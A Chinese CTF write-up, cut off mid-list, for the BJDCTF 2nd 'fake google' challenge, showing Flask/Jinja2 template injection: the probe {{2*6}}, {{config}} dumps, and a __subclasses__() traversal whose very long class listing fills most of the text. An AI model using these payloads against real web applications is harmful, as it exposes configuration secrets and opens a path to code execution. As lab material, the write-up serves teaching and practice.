zoukankan      html  css  js  c++  java
  • [BJDCTF 2nd]fake google

    记录一道关于flask模板注入的题目,今天刷题也是遇到了,所以拿出来与大家分享一下

    拿到题目,是一个Google的登录框

     

    分析

    先随便输入一个数值

    发现我们输入啥,就会回显出啥,我当时猜想是模板注入的问题

    输入{{2*6}}

    果真是模板注入问题

    一些简单的注入

    {{config}}可以获取当前设置
    {{self}}
    {{self.__dict__._TemplateReference__context.config}} 同样可以看到config

    __class__ 返回类型所属的对象
    __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
    __init__ 类的初始化方法
    __globals__ 对包含函数全局变量的字典的引用
    __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
    __bases__ 返回该对象所继承的基类 __builtins__是做为默认初始模块

    我们先来看看哪些可用的模块

    [].__class__.__bases__[0].__subclasses__() 或  [].__class__.__base__.__subclasses__()
    ---查看可用模块

    好多模块呀,我们先把他们弄成列表然后输出一下

    list="<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class 'moduledef'>, <class 'module'>, <class 'BaseException'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib._installed_safely'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'zipimport.zipimporter'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'abc.ABC'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'dict_itemiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>, <class 'types.DynamicClassAttribute'>, <class 'functools.partial'>, <class 'functools._lru_cache_wrapper'>, <class 'operator.itemgetter'>, <class 'operator.attrgetter'>, <class 'operator.methodcaller'>, <class 'itertools.accumulate'>, <class 'itertools.combinations'>, <class 'itertools.combinations_with_replacement'>, <class 'itertools.cycle'>, <class 'itertools.dropwhile'>, <class 'itertools.takewhile'>, <class 'itertools.islice'>, <class 'itertools.starmap'>, <class 'itertools.chain'>, <class 'itertools.compress'>, <class 'itertools.filterfalse'>, <class 'itertools.count'>, <class 'itertools.zip_longest'>, <class 'itertools.permutations'>, <class 'itertools.product'>, <class 'itertools.repeat'>, <class 'itertools.groupby'>, <class 'itertools._grouper'>, <class 'itertools._tee'>, <class 'itertools._tee_dataobject'>, <class 'reprlib.Repr'>, <class 'collections.deque'>, <class '_collections._deque_iterator'>, <class '_collections._deque_reverse_iterator'>, <class 'collections._Link'>, <class 'weakref.finalize._Info'>, <class 'weakref.finalize'>, <class 'functools.partialmethod'>, <class 'types._GeneratorWrapper'>, <class 'enum.auto'>, <enum 'Enum'>, <class '_sre.SRE_Pattern'>, <class '_sre.SRE_Match'>, <class '_sre.SRE_Scanner'>, <class 'sre_parse.Pattern'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'string.Template'>, <class 'string.Formatter'>, <class 'markupsafe._MarkupEscapeHelper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'zlib.Compress'>, <class 'zlib.Decompress'>, <class 'tokenize.Untokenizer'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class '_bz2.BZ2Compressor'>, <class '_bz2.BZ2Decompressor'>, <class '_lzma.LZMACompressor'>, <class '_lzma.LZMADecompressor'>, <class '_hashlib.HASH'>, <class '_blake2.blake2b'>, <class '_blake2.blake2s'>, <class '_sha3.sha3_224'>, <class '_sha3.sha3_256'>, <class '_sha3.sha3_384'>, <class '_sha3.sha3_512'>, <class '_sha3.shake_128'>, <class '_sha3.shake_256'>, <class '_random.Random'>, <class 'tempfile._RandomNameSequence'>, <class 'tempfile._TemporaryFileCloser'>, <class 'tempfile._TemporaryFileWrapper'>, <class 'tempfile.SpooledTemporaryFile'>, <class 'tempfile.TemporaryDirectory'>, <class 'Struct'>, <class 'pickle._Framer'>, <class 'pickle._Unframer'>, <class 'pickle._Pickler'>, <class 'pickle._Unpickler'>, <class '_pickle.Unpickler'>, <class '_pickle.Pickler'>, <class '_pickle.Pdata'>, <class '_pickle.PicklerMemoProxy'>, <class '_pickle.UnpicklerMemoProxy'>, <class 'urllib.parse._ResultMixinStr'>, <class 'urllib.parse._ResultMixinBytes'>, <class 'urllib.parse._NetlocResultMixinBase'>, <class '_json.Scanner'>, <class '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.idtracking.Symbols'>, <class '__future__._Feature'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.LoopContext'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal.Context'>, <class 'decimal.SignalDictMixin'>, <class 'decimal.ContextManager'>, <class 'numbers.Number'>, <class '_ast.AST'>, <class 'ast.NodeVisitor'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'importlib.abc.Finder'>, <class 'importlib.abc.Loader'>, <class 'contextlib.ContextDecorator'>, <class 'pkgutil.ImpImporter'>, <class 'pkgutil.ImpLoader'>, <class 'jinja2.loaders.BaseLoader'>, <class 'select.poll'>, <class 'select.epoll'>, <class 'selectors.BaseSelector'>, <class '_socket.socket'>, <class 'datetime.date'>, <class 'datetime.timedelta'>, <class 'datetime.time'>, <class 'datetime.tzinfo'>, <class 'dis.Bytecode'>, <class 'inspect.BlockFinder'>, <class 'inspect._void'>, <class 'inspect._empty'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'logging.LogRecord'>, <class 'logging.PercentStyle'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <class 'socketserver.BaseServer'>, <class 'socketserver.ForkingMixIn'>, <class 'socketserver.ThreadingMixIn'>, <class 'socketserver.BaseRequestHandler'>, <class 'calendar._localized_month'>, <class 'calendar._localized_day'>, <class 'calendar.Calendar'>, <class 'calendar.different_locale'>, <class 'email._parseaddr.AddrlistClass'>, <class 'email.charset.Charset'>, <class 'email.header.Header'>, <class 'email.header._ValueFormatter'>, <class 'email._policybase._PolicyBase'>, <class 'email.feedparser.BufferedSubFile'>, <class 'email.feedparser.FeedParser'>, <class 'email.parser.Parser'>, <class 'email.parser.BytesParser'>, <class 'email.message.Message'>, <class 'http.client.HTTPConnection'>, <class 'ipaddress._IPAddressBase'>, <class 'ipaddress._BaseV4'>, <class 'ipaddress._IPv4Constants'>, <class 'ipaddress._BaseV6'>, <class 'ipaddress._IPv6Constants'>, <class 'textwrap.TextWrapper'>, <class '_ssl._SSLContext'>, <class '_ssl._SSLSocket'>, <class '_ssl.MemoryBIO'>, <class '_ssl.Session'>, <class 'ssl.SSLObject'>, <class 'mimetypes.MimeTypes'>, <class 'gettext.NullTranslations'>, <class 'argparse._AttributeHolder'>, <class 'argparse.HelpFormatter._Section'>, <class 'argparse.HelpFormatter'>, <class 'argparse.FileType'>, <class 'argparse._ActionsContainer'>, <class 'click._compat._FixupStream'>, <class 'shlex.shlex'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.types.ParamType'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'urllib.request.Request'>, <class 'urllib.request.OpenerDirector'>, <class 'urllib.request.BaseHandler'>, <class 'urllib.request.HTTPPasswordMgr'>, <class 'urllib.request.AbstractBasicAuthHandler'>, <class 'urllib.request.AbstractDigestAuthHandler'>, <class 'urllib.request.URLopener'>, <class 'urllib.request.ftpwrapper'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.cors.CORSRequestMixin'>, <class 'werkzeug.wrappers.cors.CORSResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'http.cookiejar.Cookie'>, <class 'http.cookiejar.CookiePolicy'>, <class 'http.cookiejar.Absent'>, <class 'http.cookiejar.CookieJar'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'uuid.UUID'>, <class 'CArgObject'>, <class '_ctypes.CThunkObject'>, <class '_ctypes._CData'>, <class '_ctypes.CField'>, <class '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>, <class 'itsdangerous._json._CompactJSON'>, <class 'hmac.HMAC'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask._compat._DeprecatedBool'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'difflib.SequenceMatcher'>, <class 'difflib.Differ'>, <class 'difflib.HtmlDiff'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'werkzeug.wrappers.json._JSONModule'>, <class 'werkzeug.wrappers.json.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <class 'unicodedata.UCD'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>"
    list2=list.replace("<", """)
    list3=list2.replace(">", """)
    list4=["class 'type'", "class 'weakref'", "class 'weakcallableproxy'", "class 'weakproxy'", "class 'int'", "class 'bytearray'", "class 'bytes'", "class 'list'", "class 'NoneType'", "class 'NotImplementedType'", "class 'traceback'", "class 'super'", "class 'range'", "class 'dict'", "class 'dict_keys'", "class 'dict_values'", "class 'dict_items'", "class 'odict_iterator'", "class 'set'", "class 'str'", "class 'slice'", "class 'staticmethod'", "class 'complex'", "class 'float'", "class 'frozenset'", "class 'property'", "class 'managedbuffer'", "class 'memoryview'", "class 'tuple'", "class 'enumerate'", "class 'reversed'", "class 'stderrprinter'", "class 'code'", "class 'frame'", "class 'builtin_function_or_method'", "class 'method'", "class 'function'", "class 'mappingproxy'", "class 'generator'", "class 'getset_descriptor'", "class 'wrapper_descriptor'", "class 'method-wrapper'", "class 'ellipsis'", "class 'member_descriptor'", "class 'types.SimpleNamespace'", "class 'PyCapsule'", "class 'longrange_iterator'", "class 'cell'", "class 'instancemethod'", "class 'classmethod_descriptor'", "class 'method_descriptor'", "class 'callable_iterator'", "class 'iterator'", "class 'coroutine'", "class 'coroutine_wrapper'", "class 'EncodingMap'", "class 'fieldnameiterator'", "class 'formatteriterator'", "class 'filter'", "class 'map'", "class 'zip'", "class 'moduledef'", "class 'module'", "class 'BaseException'", "class '_frozen_importlib._ModuleLock'", "class '_frozen_importlib._DummyModuleLock'", "class '_frozen_importlib._ModuleLockManager'", "class '_frozen_importlib._installed_safely'", "class '_frozen_importlib.ModuleSpec'", "class '_frozen_importlib.BuiltinImporter'", "class 'classmethod'", "class '_frozen_importlib.FrozenImporter'", "class '_frozen_importlib._ImportLockContext'", "class '_thread._localdummy'", "class '_thread._local'", "class '_thread.lock'", "class '_thread.RLock'", "class '_frozen_importlib_external.WindowsRegistryFinder'", "class '_frozen_importlib_external._LoaderBasics'", "class '_frozen_importlib_external.FileLoader'", "class '_frozen_importlib_external._NamespacePath'", "class '_frozen_importlib_external._NamespaceLoader'", "class '_frozen_importlib_external.PathFinder'", "class '_frozen_importlib_external.FileFinder'", "class '_io._IOBase'", "class '_io._BytesIOBuffer'", "class '_io.IncrementalNewlineDecoder'", "class 'posix.ScandirIterator'", "class 'posix.DirEntry'", "class 'zipimport.zipimporter'", "class 'codecs.Codec'", "class 'codecs.IncrementalEncoder'", "class 'codecs.IncrementalDecoder'", "class 'codecs.StreamReaderWriter'", "class 'codecs.StreamRecoder'", "class '_weakrefset._IterationGuard'", "class '_weakrefset.WeakSet'", "class 'abc.ABC'", "class 'collections.abc.Hashable'", "class 'collections.abc.Awaitable'", "class 'collections.abc.AsyncIterable'", "class 'async_generator'", "class 'collections.abc.Iterable'", "class 'bytes_iterator'", "class 'bytearray_iterator'", "class 'dict_keyiterator'", "class 'dict_valueiterator'", "class 'dict_itemiterator'", "class 'list_iterator'", "class 'list_reverseiterator'", "class 'range_iterator'", "class 'set_iterator'", "class 'str_iterator'", "class 'tuple_iterator'", "class 'collections.abc.Sized'", "class 'collections.abc.Container'", "class 'collections.abc.Callable'", "class 'os._wrap_close'", "class '_sitebuiltins.Quitter'", "class '_sitebuiltins._Printer'", "class '_sitebuiltins._Helper'", "class 'types.DynamicClassAttribute'", "class 'functools.partial'", "class 'functools._lru_cache_wrapper'", "class 'operator.itemgetter'", "class 'operator.attrgetter'", "class 'operator.methodcaller'", "class 'itertools.accumulate'", "class 'itertools.combinations'", "class 'itertools.combinations_with_replacement'", "class 'itertools.cycle'", "class 'itertools.dropwhile'", "class 'itertools.takewhile'", "class 'itertools.islice'", "class 'itertools.starmap'", "class 'itertools.chain'", "class 'itertools.compress'", "class 'itertools.filterfalse'", "class 'itertools.count'", "class 'itertools.zip_longest'", "class 'itertools.permutations'", "class 'itertools.product'", "class 'itertools.repeat'", "class 'itertools.groupby'", "class 'itertools._grouper'", "class 'itertools._tee'", "class 'itertools._tee_dataobject'", "class 'reprlib.Repr'", "class 'collections.deque'", "class '_collections._deque_iterator'", "class '_collections._deque_reverse_iterator'", "class 'collections._Link'", "class 'weakref.finalize._Info'", "class 'weakref.finalize'", "class 'functools.partialmethod'", "class 'types._GeneratorWrapper'", "class 'enum.auto'", "enum 'Enum'", "class '_sre.SRE_Pattern'", "class '_sre.SRE_Match'", "class '_sre.SRE_Scanner'", "class 'sre_parse.Pattern'", "class 'sre_parse.SubPattern'", "class 'sre_parse.Tokenizer'", "class 're.Scanner'", "class 'string.Template'", "class 'string.Formatter'", "class 'markupsafe._MarkupEscapeHelper'", "class 'warnings.WarningMessage'", "class 'warnings.catch_warnings'", "class 'zlib.Compress'", "class 'zlib.Decompress'", "class 'tokenize.Untokenizer'", "class 'traceback.FrameSummary'", "class 'traceback.TracebackException'", "class 'threading._RLock'", "class 'threading.Condition'", "class 'threading.Semaphore'", "class 'threading.Event'", "class 'threading.Barrier'", "class 'threading.Thread'", "class '_bz2.BZ2Compressor'", "class '_bz2.BZ2Decompressor'", "class '_lzma.LZMACompressor'", "class '_lzma.LZMADecompressor'", "class '_hashlib.HASH'", "class '_blake2.blake2b'", "class '_blake2.blake2s'", "class '_sha3.sha3_224'", "class '_sha3.sha3_256'", "class '_sha3.sha3_384'", "class '_sha3.sha3_512'", "class '_sha3.shake_128'", "class '_sha3.shake_256'", "class '_random.Random'", "class 'tempfile._RandomNameSequence'", "class 'tempfile._TemporaryFileCloser'", "class 'tempfile._TemporaryFileWrapper'", "class 'tempfile.SpooledTemporaryFile'", "class 'tempfile.TemporaryDirectory'", "class 'Struct'", "class 'pickle._Framer'", "class 'pickle._Unframer'", "class 'pickle._Pickler'", "class 'pickle._Unpickler'", "class '_pickle.Unpickler'", "class '_pickle.Pickler'", "class '_pickle.Pdata'", "class '_pickle.PicklerMemoProxy'", "class '_pickle.UnpicklerMemoProxy'", "class 'urllib.parse._ResultMixinStr'", "class 'urllib.parse._ResultMixinBytes'", "class 'urllib.parse._NetlocResultMixinBase'", "class '_json.Scanner'", "class '_json.Encoder'", "class 'json.decoder.JSONDecoder'", "class 'json.encoder.JSONEncoder'", "class 'jinja2.utils.MissingType'", "class 'jinja2.utils.LRUCache'", "class 'jinja2.utils.Cycler'", "class 'jinja2.utils.Joiner'", "class 'jinja2.utils.Namespace'", "class 'jinja2.bccache.Bucket'", "class 'jinja2.bccache.BytecodeCache'", "class 'jinja2.nodes.EvalContext'", "class 'jinja2.nodes.Node'", "class 'jinja2.visitor.NodeVisitor'", "class 'jinja2.idtracking.Symbols'", "class '__future__._Feature'", "class 'jinja2.compiler.MacroRef'", "class 'jinja2.compiler.Frame'", "class 'jinja2.runtime.TemplateReference'", "class 'jinja2.runtime.Context'", "class 'jinja2.runtime.BlockReference'", "class 'jinja2.runtime.LoopContext'", "class 'jinja2.runtime.Macro'", "class 'jinja2.runtime.Undefined'", "class 'decimal.Decimal'", "class 'decimal.Context'", "class 'decimal.SignalDictMixin'", "class 'decimal.ContextManager'", "class 'numbers.Number'", "class '_ast.AST'", "class 'ast.NodeVisitor'", "class 'jinja2.lexer.Failure'", "class 'jinja2.lexer.TokenStreamIterator'", "class 'jinja2.lexer.TokenStream'", "class 'jinja2.lexer.Lexer'", "class 'jinja2.parser.Parser'", "class 'jinja2.environment.Environment'", "class 'jinja2.environment.Template'", "class 'jinja2.environment.TemplateModule'", "class 'jinja2.environment.TemplateExpression'", "class 'jinja2.environment.TemplateStream'", "class 'importlib.abc.Finder'", "class 'importlib.abc.Loader'", "class 'contextlib.ContextDecorator'", "class 'pkgutil.ImpImporter'", "class 'pkgutil.ImpLoader'", "class 'jinja2.loaders.BaseLoader'", "class 'select.poll'", "class 'select.epoll'", "class 'selectors.BaseSelector'", "class '_socket.socket'", "class 'datetime.date'", "class 'datetime.timedelta'", "class 'datetime.time'", "class 'datetime.tzinfo'", "class 'dis.Bytecode'", "class 'inspect.BlockFinder'", "class 'inspect._void'", "class 'inspect._empty'", "class 'inspect.Parameter'", "class 'inspect.BoundArguments'", "class 'inspect.Signature'", "class 'logging.LogRecord'", "class 'logging.PercentStyle'", "class 'logging.Formatter'", "class 'logging.BufferingFormatter'", "class 'logging.Filter'", "class 'logging.Filterer'", "class 'logging.PlaceHolder'", "class 'logging.Manager'", "class 'logging.LoggerAdapter'", "class 'werkzeug._internal._Missing'", "class 'werkzeug._internal._DictAccessorProperty'", "class 'werkzeug.utils.HTMLBuilder'", "class 'werkzeug.exceptions.Aborter'", "class 'werkzeug.urls.Href'", "class 'socketserver.BaseServer'", "class 'socketserver.ForkingMixIn'", "class 'socketserver.ThreadingMixIn'", "class 'socketserver.BaseRequestHandler'", "class 'calendar._localized_month'", "class 'calendar._localized_day'", "class 'calendar.Calendar'", "class 'calendar.different_locale'", "class 'email._parseaddr.AddrlistClass'", "class 'email.charset.Charset'", "class 'email.header.Header'", "class 'email.header._ValueFormatter'", "class 'email._policybase._PolicyBase'", "class 'email.feedparser.BufferedSubFile'", "class 'email.feedparser.FeedParser'", "class 'email.parser.Parser'", "class 'email.parser.BytesParser'", "class 'email.message.Message'", "class 'http.client.HTTPConnection'", "class 'ipaddress._IPAddressBase'", "class 'ipaddress._BaseV4'", "class 'ipaddress._IPv4Constants'", "class 'ipaddress._BaseV6'", "class 'ipaddress._IPv6Constants'", "class 'textwrap.TextWrapper'", "class '_ssl._SSLContext'", "class '_ssl._SSLSocket'", "class '_ssl.MemoryBIO'", "class '_ssl.Session'", "class 'ssl.SSLObject'", "class 'mimetypes.MimeTypes'", "class 'gettext.NullTranslations'", "class 'argparse._AttributeHolder'", "class 'argparse.HelpFormatter._Section'", "class 'argparse.HelpFormatter'", "class 'argparse.FileType'", "class 'argparse._ActionsContainer'", "class 'click._compat._FixupStream'", "class 'shlex.shlex'", "class 'click._compat._AtomicFile'", "class 'click.utils.LazyFile'", "class 'click.utils.KeepOpenFile'", "class 'click.utils.PacifyFlushWrapper'", "class 'click.parser.Option'", "class 'click.parser.Argument'", "class 'click.parser.ParsingState'", "class 'click.parser.OptionParser'", "class 'click.types.ParamType'", "class 'click.formatting.HelpFormatter'", "class 'click.core.Context'", "class 'click.core.BaseCommand'", "class 'click.core.Parameter'", "class 'werkzeug.serving.WSGIRequestHandler'", "class 'werkzeug.serving._SSLContext'", "class 'werkzeug.serving.BaseWSGIServer'", "class 'werkzeug.datastructures.ImmutableListMixin'", "class 'werkzeug.datastructures.ImmutableDictMixin'", "class 'werkzeug.datastructures.UpdateDictMixin'", "class 'werkzeug.datastructures.ViewItems'", "class 'werkzeug.datastructures._omd_bucket'", "class 'werkzeug.datastructures.Headers'", "class 'werkzeug.datastructures.ImmutableHeadersMixin'", "class 'werkzeug.datastructures.IfRange'", "class 'werkzeug.datastructures.Range'", "class 'werkzeug.datastructures.ContentRange'", "class 'werkzeug.datastructures.FileStorage'", "class 'urllib.request.Request'", "class 'urllib.request.OpenerDirector'", "class 'urllib.request.BaseHandler'", "class 'urllib.request.HTTPPasswordMgr'", "class 'urllib.request.AbstractBasicAuthHandler'", "class 'urllib.request.AbstractDigestAuthHandler'", "class 'urllib.request.URLopener'", "class 'urllib.request.ftpwrapper'", "class 'werkzeug.wrappers.accept.AcceptMixin'", "class 'werkzeug.wrappers.auth.AuthorizationMixin'", "class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'", "class 'werkzeug.wsgi.ClosingIterator'", "class 'werkzeug.wsgi.FileWrapper'", "class 'werkzeug.wsgi._RangeWrapper'", "class 'werkzeug.formparser.FormDataParser'", "class 'werkzeug.formparser.MultiPartParser'", "class 'werkzeug.wrappers.base_request.BaseRequest'", "class 'werkzeug.wrappers.base_response.BaseResponse'", "class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'", "class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'", "class 'werkzeug.wrappers.etag.ETagRequestMixin'", "class 'werkzeug.wrappers.etag.ETagResponseMixin'", "class 'werkzeug.wrappers.cors.CORSRequestMixin'", "class 'werkzeug.wrappers.cors.CORSResponseMixin'", "class 'werkzeug.useragents.UserAgentParser'", "class 'werkzeug.useragents.UserAgent'", "class 'werkzeug.wrappers.user_agent.UserAgentMixin'", "class 'werkzeug.wrappers.request.StreamOnlyMixin'", "class 'werkzeug.wrappers.response.ResponseStream'", "class 'werkzeug.wrappers.response.ResponseStreamMixin'", "class 'http.cookiejar.Cookie'", "class 'http.cookiejar.CookiePolicy'", "class 'http.cookiejar.Absent'", "class 'http.cookiejar.CookieJar'", "class 'werkzeug.test._TestCookieHeaders'", "class 'werkzeug.test._TestCookieResponse'", "class 'werkzeug.test.EnvironBuilder'", "class 'werkzeug.test.Client'", "class 'uuid.UUID'", "class 'CArgObject'", "class '_ctypes.CThunkObject'", "class '_ctypes._CData'", "class '_ctypes.CField'", "class '_ctypes.DictRemover'", "class 'ctypes.CDLL'", "class 'ctypes.LibraryLoader'", "class 'subprocess.CompletedProcess'", "class 'subprocess.Popen'", "class 'itsdangerous._json._CompactJSON'", "class 'hmac.HMAC'", "class 'itsdangerous.signer.SigningAlgorithm'", "class 'itsdangerous.signer.Signer'", "class 'itsdangerous.serializer.Serializer'", "class 'itsdangerous.url_safe.URLSafeSerializerMixin'", "class 'flask._compat._DeprecatedBool'", "class 'werkzeug.local.Local'", "class 'werkzeug.local.LocalStack'", "class 'werkzeug.local.LocalManager'", "class 'werkzeug.local.LocalProxy'", "class 'difflib.SequenceMatcher'", "class 'difflib.Differ'", "class 'difflib.HtmlDiff'", "class 